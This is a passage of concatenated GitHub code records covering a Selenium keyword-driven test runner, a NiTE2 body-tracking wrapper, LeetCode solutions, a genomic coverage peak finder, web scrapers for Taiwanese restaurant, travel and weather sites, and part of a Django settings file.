self.assertTrue(is_exist)\n continue\n try:\n element = self.driver.find_elements(*locator)[index]\n except Exception as e:\n element = auto_get_element(self.driver, res)\n\n if 'send_key' == action or '输入' == action:\n element.send_keys(content)\n elif 'click' in action or '点击' in action:\n element.click()\n elif 'get_text' in action or '获取文本' in action:\n assert_content[variable] = element.get_attribute('innerText')\n elif 'get_attr' in action or '获取属性' in action:\n assert_content[variable] = element.get_attribute(content)\n elif 'assert_contains' in action or '断言包含' in action:\n print('进行断言')\n assert_list = str(content).split(',')\n self.assertIn(assert_list[0], assert_content[assert_list[1]])\n elif 'assert_equal' in action or '断言相等' in action:\n print('进行断言')\n assert_list = str(content).split(',')\n self.assertEqual(assert_list[0], assert_content[assert_list[1]])\n elif 'sleep' == action or '等待' == action:\n time.sleep(content)\n\n\ndef to_demo(case_date):\n # 调入测试数据 执行用例\n def demo(self):\n Test.begin_test(self, case_date)\n\n setattr(demo, '__doc__', str(case_date['case_name'] + ':' + case_date['case_des']))\n return demo\n\n\ndef to_test(excel_data):\n \"\"\"\n 将读取到的excel内容 转换成测试用例\n \"\"\"\n # 遍历表格内容\n for i in range(len(excel_data)):\n # 动态生成用例\n setattr(Test, 'test_%s' % str(i + 1), to_demo(excel_data[i]))\n\n\ndef read_excel(file_name):\n file = os.path.dirname(os.path.dirname(__file__)) + \"/case/%s\" % file_name\n # 打开excel表格\n excel_file = xlrd.open_workbook_xls(filename=file)\n # 获取到对应的sheet\n sheet = excel_file.sheet_by_index(0)\n # 声明变量储存excel中的内容 datas格式:[{},{}....]\n datas = []\n # 获取行总行数\n rows = sheet.nrows\n case_content = {}\n # 遍历表格获取内容\n for i in range(0, rows):\n if 'case' == sheet.cell_value(i, 0):\n case_content = {'case_name': sheet.cell_value(i, 1), 'case_des': sheet.cell_value(i, 2),\n 'case_steps': []}\n datas.append(case_content)\n else:\n # 具体步骤\n step_tmp = {'step': sheet.cell_value(i, 0), 'locator': sheet.cell_value(i, 3),\n 'action': sheet.cell_value(i, 1), 'content': sheet.cell_value(i, 2),\n 'variable': sheet.cell_value(i, 4)}\n case_content['case_steps'].append(step_tmp)\n\n return datas\n\n\nif __name__ == '__main__':\n data = read_excel('关键字驱动.xls')\n to_test(data)\n\n param = {}\n try:\n # 获取第二个系统参数\n host = sys.argv[1]\n script_name = sys.argv[2]\n case_name = sys.argv[3]\n env = \"online\"\n except:\n # ====================== 本地调试需要手动输入以下内容 ======================\n # ====================== host:调试地址 ======================\n # ====================== script_name:当前脚本文件名称 ====================\n # ====================== case_name:用例名称 =========================\n host = \"https://www.baidu.com\"\n script_name = \"test_py.py\"\n case_name = \"本地调试\"\n env = \"local\"\n param[\"script_name\"] = script_name\n param[\"case_name\"] = case_name\n param[\"env\"] = env\n # unittest.main()\n util_run_with_report(self=Test, param=param)\n","repo_name":"JxcChen/WE_UI","sub_path":"my_client/client_10/public/xls_to_script.py","file_name":"xls_to_script.py","file_ext":"py","file_size_in_byte":5878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22104217706","text":"# pylint: disable=W0212,W0603\n\nimport sys\nimport os\nimport weakref\nimport atexit\nimport ctypes\nimport platform\nfrom openni import _nite2 as c_api\nfrom openni import openni2\nfrom openni.utils import inherit_properties, ClosedHandle, HandleObject, InitializationError\n\nfrom openni._nite2 import NiteJointType as JointType\nfrom openni._nite2 import NiteSkeletonState as SkeletonState\nfrom openni._nite2 import NiteUserState as UserState\nfrom openni._nite2 import NitePoseType as PoseType\nfrom openni._nite2 import NiteGestureType as GestureType\n\narch = int(platform.architecture()[0].lower().replace(\"bit\", \"\"))\n\n_default_dll_directories = []\nif arch == 32:\n if \"NITE2_REDIST\" in os.environ:\n _default_dll_directories.append(os.environ[\"NITE2_REDIST\"])\nelif arch == 64:\n if \"NITE2_REDIST64\" in os.environ:\n _default_dll_directories.append(os.environ[\"NITE2_REDIST64\"])\n elif \"NITE2_REDIST\" in os.environ:\n _default_dll_directories.append(os.environ[\"NITE2_REDIST\"])\n\n_default_dll_directories.append(\".\")\n\nif sys.platform == \"win32\":\n _dll_name = \"NiTE2.dll\"\nelif sys.platform == \"darwin\":\n _dll_name = \"libNiTE2.dylib\"\nelse:\n _dll_name = \"libNiTE2.so\"\n\n\n_nite2_initialized = False\nloaded_dll_directory = None\n\n\ndef initialize(dll_directories=_default_dll_directories):\n global _nite2_initialized\n global loaded_dll_directory\n if _nite2_initialized:\n return\n if isinstance(dll_directories, str):\n dll_directories = [dll_directories]\n\n if not openni2.is_initialized():\n openni2.initialize()\n\n if loaded_dll_directory:\n c_api.niteInitialize()\n _nite2_initialized = True\n return\n\n found = False\n prev = os.getcwd()\n exceptions = []\n dll_directories = [os.path.normpath(os.path.abspath(d)) for d in dll_directories]\n\n for dlldir in dll_directories:\n if not os.path.isdir(dlldir):\n exceptions.append((dlldir, \"Directory does not exist\"))\n continue\n fullpath = os.path.join(dlldir, _dll_name)\n if not os.path.isfile(fullpath):\n exceptions.append((fullpath, \"file does not exist\"))\n continue\n try:\n os.chdir(dlldir)\n c_api.load_dll(fullpath)\n c_api.niteInitialize()\n except Exception as ex:\n exceptions.append((fullpath, ex))\n else:\n found = True\n loaded_dll_directory = dlldir\n break\n\n os.chdir(prev)\n if not found:\n raise InitializationError(\"NiTE2 could not be loaded:\\n %s\" %\n (\"\\n \".join(\"%s: %s\" % (dir, ex) for dir, ex in exceptions)),)\n\n _nite2_initialized = True\n\n\ndef is_initialized():\n return _nite2_initialized\n\n\n_registered_user_trackers = weakref.WeakSet()\n_registered_user_tracker_frames = weakref.WeakSet()\n_registered_hand_trackers = weakref.WeakSet()\n_registered_hand_tracker_frames = weakref.WeakSet()\n_registered_user_tracker_listeners = weakref.WeakSet()\n_registered_hand_tracker_listeners = weakref.WeakSet()\n\n\ndef unload():\n global _nite2_initialized\n if not _nite2_initialized:\n return\n for coll in [_registered_user_tracker_frames, _registered_hand_tracker_frames, _registered_hand_trackers,\n _registered_user_trackers, _registered_user_tracker_listeners, _registered_hand_tracker_listeners]:\n for hndl in coll:\n hndl.close()\n coll.clear()\n\n _nite2_initialized = False\n c_api.niteShutdown()\n\n\natexit.register(unload)\n\n\ndef get_version():\n return c_api.niteGetVersion()\n\n\nPoint3f = c_api.NitePoint3f\nPlane = c_api.NitePlane\nQuaternion = c_api.NiteQuaternion\nBoundingBox = c_api.NiteBoundingBox\nUserId = c_api.NiteUserId\nHandId = c_api.NiteHandId\nUserMap = c_api.NiteUserMap\nSkeletonJoint = c_api.NiteSkeletonJoint\n\n\n@inherit_properties(c_api.NitePoseData, \"_posedata\")\nclass PoseData(object):\n __slots__ = [\"_posedata\"]\n\n def __init__(self, posedata):\n self._posedata = posedata\n\n def is_held(self):\n return self.state == c_api.NitePoseState.NITE_POSE_STATE_IN_POSE\n\n def is_entered(self):\n return self.state == c_api.NitePoseState.NITE_POSE_STATE_ENTER\n\n def is_exited(self):\n return self.state == c_api.NitePoseState.NITE_POSE_STATE_EXIT\n\n\n@inherit_properties(c_api.NiteSkeleton, \"_skeleton\")\nclass Skeleton(object):\n __slots__ = [\"_skeleton\"]\n\n def __init__(self, skeleton):\n self._skeleton = skeleton\n\n def get_joint(self, jointtype):\n return self.joints[jointtype]\n\n\n@inherit_properties(c_api.NiteUserData, \"_userdata\")\nclass UserData(object):\n __slots__ = [\"_userdata\"]\n\n def __init__(self, userdata):\n self._userdata = userdata\n\n def is_new(self):\n return self.state == c_api.NiteUserState.NITE_USER_STATE_NEW\n\n def is_visible(self):\n return self.state == c_api.NiteUserState.NITE_USER_STATE_VISIBLE\n\n def is_lost(self):\n return self.state == c_api.NiteUserState.NITE_USER_STATE_LOST\n\n def get_pose(self, posetype):\n return PoseData(self.poses[posetype])\n\n\n@inherit_properties(c_api.NiteUserTrackerFrame, \"_frame\")\nclass UserTrackerFrame(HandleObject):\n __slots__ = [\"_frame\", \"_user_tracker_handle\", \"_depth_frame\", \"users\", \"users_by_id\", \"__weakref__\"]\n\n def __init__(self, pframe, user_tracker_handle):\n self._frame = pframe[0]\n self._user_tracker_handle = user_tracker_handle\n self._depth_frame = None\n c_api.niteUserTrackerFrameAddRef(user_tracker_handle, pframe)\n HandleObject.__init__(self, pframe)\n self.users = []\n self.users_by_id = {}\n for i in range(self.userCount):\n u = UserData(self.pUser[i])\n self.users.append(u)\n self.users_by_id[u.id] = u\n _registered_user_tracker_frames.add(self)\n\n def _close(self):\n if is_initialized():\n c_api.niteUserTrackerFrameRelease(self._user_tracker_handle, self._handle)\n self._frame = ClosedHandle\n self._user_tracker_handle = ClosedHandle\n del self.users[:]\n\n def get_depth_frame(self):\n if self._depth_frame is None:\n self._depth_frame = openni2.VideoFrame(self.pDepthFrame)\n return self._depth_frame\n\n\nclass _NiteDevStruct(ctypes.Structure):\n \"\"\"\n PlaybackControl* m_pPlaybackControl;\n\n OniDeviceHandle m_device;\n DeviceInfo m_deviceInfo;\n SensorInfo m_aSensorInfo[ONI_MAX_SENSORS];\n\n bool m_isOwner;\n \"\"\"\n\n _fields_ = [\n (\"pPlaybackControl\", ctypes.c_void_p),\n (\"device\", openni2.c_api.OniDeviceHandle),\n\n (\"device_info\", openni2.c_api.OniDeviceInfo),\n (\"sensor_info\", openni2.c_api.OniSensorInfo * 10),\n\n (\"is_owner\", ctypes.c_bool)\n ]\n\n\nclass UserTracker(HandleObject):\n def __init__(self, device):\n handle = c_api.NiteUserTrackerHandle()\n if not device:\n c_api.niteInitializeUserTracker(ctypes.byref(handle))\n else:\n self._devstruct = _NiteDevStruct()\n self._devstruct.pPlaybackControl = None\n self._devstruct.device = device._handle\n self._devstruct.device_info = device.get_device_info()\n # self._devstruct.sensor_info = device.get_sensor_infos(sensor_type)\n self._devstruct.is_owner = True\n c_api.niteInitializeUserTrackerByDevice(ctypes.byref(self._devstruct), ctypes.byref(handle))\n\n HandleObject.__init__(self, handle)\n _registered_user_trackers.add(self)\n\n @classmethod\n def open_any(cls):\n return UserTracker(None)\n\n def _close(self):\n if is_initialized():\n c_api.niteShutdownUserTracker(self._handle)\n\n def read_frame(self):\n pnf = ctypes.POINTER(c_api.NiteUserTrackerFrame)()\n c_api.niteReadUserTrackerFrame(self._handle, ctypes.byref(pnf))\n return UserTrackerFrame(pnf, self._handle)\n\n def set_skeleton_smoothing_factor(self, factor):\n return c_api.niteSetSkeletonSmoothing(self._handle, factor)\n\n def get_skeleton_smoothing_factor(self):\n factor = ctypes.c_float()\n c_api.niteGetSkeletonSmoothing(self._handle, ctypes.byref(factor))\n return factor.value\n skeleton_smoothing_factor = property(get_skeleton_smoothing_factor, set_skeleton_smoothing_factor)\n\n def start_skeleton_tracking(self, userid):\n c_api.niteStartSkeletonTracking(self._handle, userid)\n\n def stop_skeleton_tracking(self, userid):\n c_api.niteStopSkeletonTracking(self._handle, userid)\n\n def is_tracking(self, userid):\n c_api.niteIsSkeletonTracking(self._handle, userid)\n\n def start_pose_detection(self, userid, posetype):\n c_api.niteStartPoseDetection(self._handle, userid, posetype)\n\n def stop_pose_detection(self, userid, posetype):\n c_api.niteStopPoseDetection(self._handle, userid, posetype)\n\n def stop_all_pose_detection(self, userid):\n c_api.niteStopAllPoseDetection(self._handle, userid)\n\n def convert_joint_coordinates_to_depth(self, x, y, z):\n outX = ctypes.c_float()\n outY = ctypes.c_float()\n c_api.niteConvertJointCoordinatesToDepth(self._handle, x, y, z, ctypes.byref(outX), ctypes.byref(outY))\n return (outX.value, outY.value)\n\n def convert_depth_coordinates_to_joint(self, x, y, z):\n outX = ctypes.c_float()\n outY = ctypes.c_float()\n c_api.niteConvertDepthCoordinatesToJoint(self._handle, x, y, z, ctypes.byref(outX), ctypes.byref(outY))\n return (outX.value, outY.value)\n\n\n@inherit_properties(c_api.NiteGestureData, \"_gesture\")\nclass GestureData(object):\n def __init__(self, gesture):\n self._gesture = gesture\n\n def is_complete(self):\n return self.state == c_api.NiteGestureState.NITE_GESTURE_STATE_COMPLETED\n\n def is_in_progress(self):\n return self.state == c_api.NiteGestureState.NITE_GESTURE_STATE_IN_PROGRESS\n\n\n@inherit_properties(c_api.NiteHandData, \"_handdata\")\nclass HandData(object):\n def __init__(self, handdata):\n self._handdata = handdata\n\n def is_new(self):\n return self.state == c_api.NiteHandState.NITE_HAND_STATE_NEW\n\n def is_lost(self):\n return self.state == c_api.NiteHandState.NITE_HAND_STATE_LOST\n\n def is_tracking(self):\n return self.state == c_api.NiteHandState.NITE_HAND_STATE_TRACKED\n\n def is_touching_fov(self):\n return self.state == c_api.NiteHandState.NITE_HAND_STATE_TOUCHING_FOV\n\n\n@inherit_properties(c_api.NiteHandTrackerFrame, \"_frame\")\nclass HandTrackerFrame(HandleObject):\n def __init__(self, hand_tracker_handle, pframe):\n self._hand_tracker_handle = hand_tracker_handle\n self._frame = pframe[0]\n c_api.niteHandTrackerFrameAddRef(hand_tracker_handle, pframe)\n HandleObject.__init__(self, pframe)\n self._depth_frame = None\n self._hands = None\n self._gestures = None\n _registered_hand_tracker_frames.add(self)\n\n def _close(self):\n if is_initialized():\n c_api.niteHandTrackerFrameRelease(self._hand_tracker_handle, self._handle)\n\n @property\n def depth_frame(self):\n if self._depth_frame is None:\n self._depth_frame = openni2.VideoFrame(self._frame.pDepthFrame)\n return self._depth_frame\n\n @property\n def hands(self):\n if self._hands is None:\n self._hands = [self._frame.pHands[i] for i in range(self._frame.handCount)]\n return self._hands\n\n @property\n def gestures(self):\n if self._gestures is None:\n self._gestures = [self._frame.pGestures[i] for i in range(self._frame.gestureCount)]\n return self._gestures\n\n\nclass HandTracker(HandleObject):\n def __init__(self, device):\n self.device = device\n handle = c_api.NiteHandTrackerHandle()\n if not device:\n c_api.niteInitializeHandTracker(ctypes.byref(handle))\n else:\n self._devstruct = _NiteDevStruct()\n self._devstruct.device = device._handle\n c_api.niteInitializeHandTrackerByDevice(ctypes.byref(self._devstruct), ctypes.byref(handle))\n HandleObject.__init__(self, handle)\n _registered_hand_trackers.add(self)\n\n @classmethod\n def open_any(cls):\n return cls(None)\n\n def _close(self):\n if is_initialized():\n c_api.niteShutdownHandTracker(self._handle)\n\n def read_frame(self):\n pfrm = ctypes.POINTER(c_api.NiteHandTrackerFrame)()\n c_api.niteReadHandTrackerFrame(self._handle, ctypes.byref(pfrm))\n return HandTrackerFrame(self._handle, pfrm)\n\n def set_smoothing_factor(self, factor):\n c_api.niteSetHandSmoothingFactor(self._handle, factor)\n\n def get_smoothing_factor(self):\n factor = ctypes.c_float()\n c_api.niteGetHandSmoothingFactor(self._handle, ctypes.byref(factor))\n return factor.value\n smoothing_factor = property(get_smoothing_factor, set_smoothing_factor)\n\n def start_hand_tracking(self, *position):\n new_hand_id = HandId()\n if len(position) == 3:\n position = Point3f(*position)\n elif len(position) == 1:\n position = position[0]\n else:\n raise TypeError(\"Either Point3f or three values required\")\n c_api.niteStartHandTracking(self._handle, ctypes.byref(position), ctypes.byref(new_hand_id))\n return new_hand_id\n\n def stop_hand_tracking(self, handid):\n c_api.niteStopHandTracking(self._handle, handid)\n\n def start_gesture_detection(self, gesture_type):\n c_api.niteStartGestureDetection(self._handle, gesture_type)\n\n def stop_gesture_detection(self, gesture_type):\n c_api.niteStopGestureDetection(self._handle, gesture_type)\n\n def convert_hand_coordinates_to_depth(self, x, y, z):\n outX = ctypes.c_float()\n outY = ctypes.c_float()\n c_api.niteConvertHandCoordinatesToDepth(self._handle, x, y, z, ctypes.byref(outX), ctypes.byref(outY))\n return outX.value, outY.value\n\n def convert_depth_coordinates_to_hand(self, x, y, z):\n outX = ctypes.c_float()\n outY = ctypes.c_float()\n c_api.niteConvertDepthCoordinatesToHand(self._handle, x, y, z, ctypes.byref(outX), ctypes.byref(outY))\n return outX.value, outY.value\n\n def stop_all_hand_tracking(self):\n c_api.niteStopAllHandTracking(self._handle)\n\n def stop_all_gesture_detection(self):\n c_api.niteStopAllGestureDetection(self._handle)\n\n\nclass UserTrackerListener(HandleObject):\n def __init__(self, user_tracker):\n self.user_tracker = user_tracker\n self._callbacks = c_api.NiteUserTrackerCallbacks(\n readyForNextFrame=c_api.OniGeneralCallback(self._on_ready_for_next_frame))\n handle = ctypes.pointer(self._callbacks)\n c_api.niteRegisterUserTrackerCallbacks(self.user_tracker._handle, handle, None)\n HandleObject.__init__(self, handle)\n _registered_user_tracker_listeners.add(self)\n\n def unregister(self):\n self.close()\n\n def _close(self):\n if is_initialized():\n c_api.niteUnregisterUserTrackerCallbacks(self.user_tracker._handle, self._handle)\n self.user_tracker = None\n\n def _on_ready_for_next_frame(self, _):\n self.on_ready_for_next_frame()\n\n def on_ready_for_next_frame(self):\n \"\"\"Implement me\"\"\"\n pass\n\n\nclass HandTrackerListener(HandleObject):\n def __init__(self, hand_tracker):\n self.hand_tracker = hand_tracker\n self._callbacks = c_api.NiteHandTrackerCallbacks(\n readyForNextFrame=c_api.OniGeneralCallback(self._on_ready_for_next_frame))\n handle = ctypes.pointer(self._callbacks)\n c_api.niteRegisterHandTrackerCallbacks(self.hand_tracker._handle, handle, None)\n HandleObject.__init__(self, handle)\n _registered_hand_tracker_listeners.add(self)\n\n def _close(self):\n if is_initialized():\n c_api.niteUnregisterHandTrackerCallbacks(self.hand_tracker._handle, self._handle)\n self.hand_tracker = None\n\n def _on_ready_for_next_frame(self, _):\n self.on_ready_for_next_frame()\n\n def on_ready_for_next_frame(self):\n \"\"\"Implement me\"\"\"\n pass\n","repo_name":"severin-lemaignan/openni-python","sub_path":"openni/nite2.py","file_name":"nite2.py","file_ext":"py","file_size_in_byte":16194,"program_lang":"python","lang":"en","doc_type":"code","stars":52,"dataset":"github-code","pt":"37"} +{"seq_id":"22239624241","text":"# Definition for a binary tree node\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n # @param root, a tree node\n # @return a list of integers\n def postorderTraversal(self, root):\n nodes = []\n def postorderTraversalHelper(root, nodes):\n if root:\n postorderTraversalHelper(root.left, nodes)\n postorderTraversalHelper(root.right, nodes)\n nodes.append(root.val)\n postorderTraversalHelper(root, nodes)\n return nodes\n\nclass Solution2:\n # @param root, a tree node\n # @return a list of integers\n def postorderTraversal(self, root):\n nodes = []\n if not root:\n return nodes\n stack = [root]\n while stack:\n node = stack.pop()\n nodes.append(node.val)\n if node.left:\n stack.append(node.left)\n if node.right:\n stack.append(node.right)\n return nodes[-1::-1]","repo_name":"zhexiong/LTC","sub_path":"binary_tree_postorder_traversal.py","file_name":"binary_tree_postorder_traversal.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12917106509","text":"import pandas as pd\nimport peakutils\nimport numpy as np\nfrom matplotlib import pyplot\nimport multiprocessing\n\n\nfile='/hpc/hub_oudenaarden/edann/VAN1667_depth.bed'\n\ndef findPeaks(cov):\n \"\"\"\n detects peaks in depth.bed file (use small chunks)\n returns df in bed format of 1 kb region around detected peaks\n \"\"\"\n chr=np.array([])\n x=np.array([])\n y=np.array([])\n chrom=cov.chrom[0]\n for i in range(min(cov.start), max(cov.end)):\n df=cov[(cov.start <= i) & (cov.end > i)]\n if df.empty:\n x=np.append(x, i)\n y=np.append(y, 0)\n else:\n x=np.append(x,i)\n y=np.append(y,df.depth)\n chrom=df.chrom\n chr=np.append(chr, chrom)\n complCov=pd.DataFrame({\"pos\":x,\"depth\":y, \"chrom\":chr})\n complCov['runmeanDepth']=pd.rolling_mean(complCov.depth, 500)\n pyplot.plot(complCov.pos, complCov.runmeanDepth)\n pyplot.plot(complCov.pos, complCov.depth)\n pyplot.show()\n indexes = peakutils.indexes(complCov.runmeanDepth, thres=0.5, min_dist=1000)\n# pplot(complCov.pos, complCov.runmeanDepth, indexes)\n# pyplot.show()\n peaks = complCov.iloc()[indexes]\n peaksBed = pd.DataFrame({'chrom':peaks.chrom, 'start':peaks.pos-500, 'end':peaks.pos+500, 'cov':peaks.depth})\n return(peaksBed)\n\ndef read_in_chunks(file, chunk_size=1000):\n \"\"\"Lazy function (generator) to read a file piece by piece.\n Default chunk size: 1k.\"\"\"\n firstrow = 0\n while True:\n data = pd.read_csv(file, header=None, skiprows=firstrow, nrows=chunk_size, names=['chrom', 'start', 'end', 'depth' ], sep='\\t')\n firstrow = firstrow+chunk_size\n if data.empty:\n break\n yield data\n\n\nworkers = multiprocessing.Pool(10)\np=pd.DataFrame([])\nfor peaks in workers.map(findPeaks, [ cov for cov in read_in_chunks(file)]):\n p=p.append(peaks)\n\np.to_csv('VAN1667_depth_peaks.csv')\n","repo_name":"emdann/HexamerBias","sub_path":"thrashNsnippets/coverage_peaks/findCoveragePeaks.py","file_name":"findCoveragePeaks.py","file_ext":"py","file_size_in_byte":1898,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"39105951208","text":"from bs4 import BeautifulSoup\nimport requests\nfrom fake_useragent import UserAgent\nfrom abc import ABC, abstractmethod\nimport time\n\nua = UserAgent() \nuser_agent = UserAgent()\n\n\nclass function(ABC):\n\n @abstractmethod\n def crawler(self):\n pass\n\n\nclass IFoodie(function):\n\n def crawler(self, area):\n # IFoodie 愛食記網站\n url = \"https://ifoodie.tw/explore/\" + area + \\\n \"/list?sortby=popular&opening=true\"\n \n response = requests.get(url = url, headers = {\"user-agent\" : user_agent.random})\n \n soup = BeautifulSoup(response.content, \"html.parser\")\n\n cards = soup.find_all('div', {'class': 'jsx-1156793088 restaurant-info'}, limit=10)\n\n content = \"\"\n for card in cards:\n \n title = card.find( # 餐廳名稱\n \"a\", {\"class\": \"jsx-1156793088 title-text\"}).getText()\n\n stars = card.find( # 餐廳評價\n \"div\", {\"class\": \"jsx-2373119553 text\"}).getText()\n \n address = card.find( # 餐廳地址\n \"div\", {\"class\": \"jsx-1156793088 address-row\"}).getText()\n \n \n #將取得的餐廳名稱、評價及地址連結一起,並且指派給content變數\n content += f\"{title} - {stars}顆星 \\n{address} \\n\\n\"\n \n return content\n\n\n\n\nclass okgo(function):\n\n def crawler(self, area):\n # okgo 玩全台灣\n url = \"https://okgo.tw/Search.html?Page=1&kw=\" + area + \"&st=1\"\n response = requests.get(url = url, headers = {\"user-agent\" : user_agent.random})\n \n soup = BeautifulSoup(response.content, \"html.parser\") \n\n cards = soup.find_all('li', {'id': 'Search_Content_li'}, limit=5)\n\n content = \"\"\n for card in cards:\n web_address = card.find('a', {'class' : 'STopic'})\n\n url = \"https://okgo.tw/\" + web_address[\"href\"]\n \n response = requests.get(url = url, headers = {\"user-agent\" : user_agent.random})\n\n soup = BeautifulSoup(response.content, \"html.parser\") \n\n information = soup.find('div', {'class' : 'sec3 word Resize'})\n\n title = information.find('h2', {'style' : 'color:#40a0bf;'}).getText()\n\n zone_list = information.find('strong').find_all('a')\n zone = \"\"\n for zones in zone_list: zone += zones.text\n\n TransInfo = soup.find('div', {'id' : 'Buty_View_Traffic'}).getText()\n\n\n content += f\"{title} - {zone}\\n\\n{TransInfo}\\n\\n\"\n\n\n return content\n\n\nclass weather(function): \n\n def crawler(self, area):\n\n city_web = {\"台北市\" : \"https://weather.com/zh-TW/weather/hourbyhour/l/6b221b26e046a442e03dc46fbe91d5874c6461afde61187dd4126bddeea1e2aa\",\n \"基隆市\" : \"https://weather.com/zh-TW/weather/hourbyhour/l/7a1bd787c9a5bfd8b7290f325ea531127a0447198d4c09689f6cf12f4421a110a042adb62e0ce6b4ee0110784300e689\",\n \"台南市\" : \"https://weather.com/zh-TW/weather/hourbyhour/l/cb9a4442e9bf7da0ece89bd21a5161210e79cccc0ec2647b3565977e7a278c31\",\n \"新北市\" : \"\",\n \"台中市\" : \"https://weather.com/zh-TW/weather/hourbyhour/l/8e095973cc14ab3966eab1a0c6a1b04f5291e61049bff4cb42a510b3881afec9\",\n \"桃園市\" : \"https://weather.com/zh-TW/weather/hourbyhour/l/efbf308224729b20c95ff9150f731657639bc63cce74c8c098357587b7bbc9c4\",\n \"台南市\" : \"https://weather.com/zh-TW/weather/hourbyhour/l/cb9a4442e9bf7da0ece89bd21a5161210e79cccc0ec2647b3565977e7a278c31\",\n \"高雄市\" : \"https://weather.com/zh-TW/weather/hourbyhour/l/48697cc4c9743031df643ebe553fc08fd83bf2e96d7c7f58c0db435d5888131f\",\n \"彰化縣\" : \"https://weather.com/zh-TW/weather/hourbyhour/l/50f0afa948f93e0309ee2f37a6d34beaf66a79e423e4dec6b9bc063ce8d993c8\",\n \"新竹縣\" : \"https://weather.com/zh-TW/weather/hourbyhour/l/9d98eb3f97a83330c0599a7548c3c7b47163615858673cfee2406e208ce20604\",\n \"苗栗縣\" : \"https://weather.com/zh-TW/weather/hourbyhour/l/b994c89cc0ff3b6b56814e2730a58c821d2585ce6d3f190ea6a8c502c82268c2\",\n \"彰化縣\" : \"https://weather.com/zh-TW/weather/hourbyhour/l/50f0afa948f93e0309ee2f37a6d34beaf66a79e423e4dec6b9bc063ce8d993c8\",\n \"南投縣\" : \"https://weather.com/zh-TW/weather/hourbyhour/l/d8b83853a6cc59e5bb3fe1e512cc4be8a3e5c1842889f42c5272bc1b14c2abb9\",\n \"雲林縣\" : \"https://weather.com/zh-TW/weather/hourbyhour/l/ab23a82e059d89c364a0761975f05b158a4f996296055be39fea254d3ae8b053\",\n \"嘉義縣\" : \"https://weather.com/zh-TW/weather/hourbyhour/l/083ec430bd75b8e34579f93ce7c6c033e47d58eca20302a4ede6e3914cd1150a\",\n \"屏東縣\" : \"https://weather.com/zh-TW/weather/hourbyhour/l/2303e8481a2d2f9b32e5343dc3661a921123f3ccdd277563e4b6d7771d53a244\",\n \"台東縣\" : \"\",\n \"宜蘭縣\" : \"https://weather.com/zh-TW/weather/hourbyhour/l/509a0202845cfc5a9b7e8c39e61323b593893292803d99c5fa3fe0f572f2ddff\",\n \"花蓮縣\" : \"https://weather.com/zh-TW/weather/hourbyhour/l/6e37fc12427c24cb9ae8e50a596754434e8244b28c1a3d25b8122fb3a0dca2f6\",\n \"新竹市\" : \"https://weather.com/zh-TW/weather/hourbyhour/l/9d98eb3f97a83330c0599a7548c3c7b47163615858673cfee2406e208ce20604\",\n \"嘉義市\" : \"https://weather.com/zh-TW/weather/hourbyhour/l/083ec430bd75b8e34579f93ce7c6c033e47d58eca20302a4ede6e3914cd1150a\",\n \n }\n\n url = city_web[area]\n\n user_agent = UserAgent()\n\n response = requests.get(url=url, headers={\"user-agent\": user_agent.random})\n\n soup = BeautifulSoup(response.content, \"html.parser\")\n\n cards = soup.find_all(\n \"div\", {\"class\": \"DetailsSummary--DetailsSummary--1DqhO\"}, limit=15)\n\n content = f\"{area}每日天氣\\n\\n\"\n for card in cards:\n\n times = card.find(\n \"h3\", {\"class\": \"DetailsSummary--daypartName--kbngc\"}).getText()\n\n if times == \"00:00\": break # breakpoint\n\n temprature = card.find(\"span\", {\"class\": \"DetailsSummary--tempValue--jEiXE\"}).getText()\n\n status = card.find(\"span\", {\"class\": \"DetailsSummary--extendedData--307Ax\"}).getText()\n\n rain_prob = card.find(\"span\", {\"data-testid\": \"PercentageValue\"}).getText()\n\n content += f\"時間:{times}\\n氣溫:{temprature}\\n天氣狀況:{status}\\n降雨機率:{rain_prob}\\n\\n\"\n \n\n return content\n \n\n","repo_name":"vicwen0418/Line-Assistant-Bot","sub_path":"AssistantBot/assistantbot/crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":6652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34425157528","text":"# Link : https://leetcode.com/problems/reverse-linked-list/description/\n# Author : Mohamed Ibrahim\n\n \nclass Solution:\n def reverseList(self, head: Optional[ListNode]) -> Optional[ListNode]:\n curr = head\n pre = None\n nxt = None\n while(curr):\n nxt = curr.next # hold the next address of curr\n curr.next = pre # connect current to pre \" <- \" (reverse node)\n pre = curr # move previous\n curr = nxt # move curr \n \n return pre\n \n \n \n","repo_name":"M0hamedIbrahim1/-Data-Structure-Algorithms","sub_path":"LinkedList/Problems/206. Reverse Linked List.py","file_name":"206. Reverse Linked List.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"19195512799","text":"# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nimport os\n\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom .utils import get_env_variable\n\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = get_env_variable(\"SECRET_KEY\")\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = False\n\nALLOWED_HOSTS = []\n\n# Application definition\n\nINSTALLED_APPS = (\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'crispy_forms',\n 'master_data',\n 'back_office',\n 'students',\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.locale.LocaleMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.auth.middleware.SessionAuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n 'django.middleware.security.SecurityMiddleware',\n)\n\nROOT_URLCONF = 'halaqat.urls'\n\nTEMPLATES = 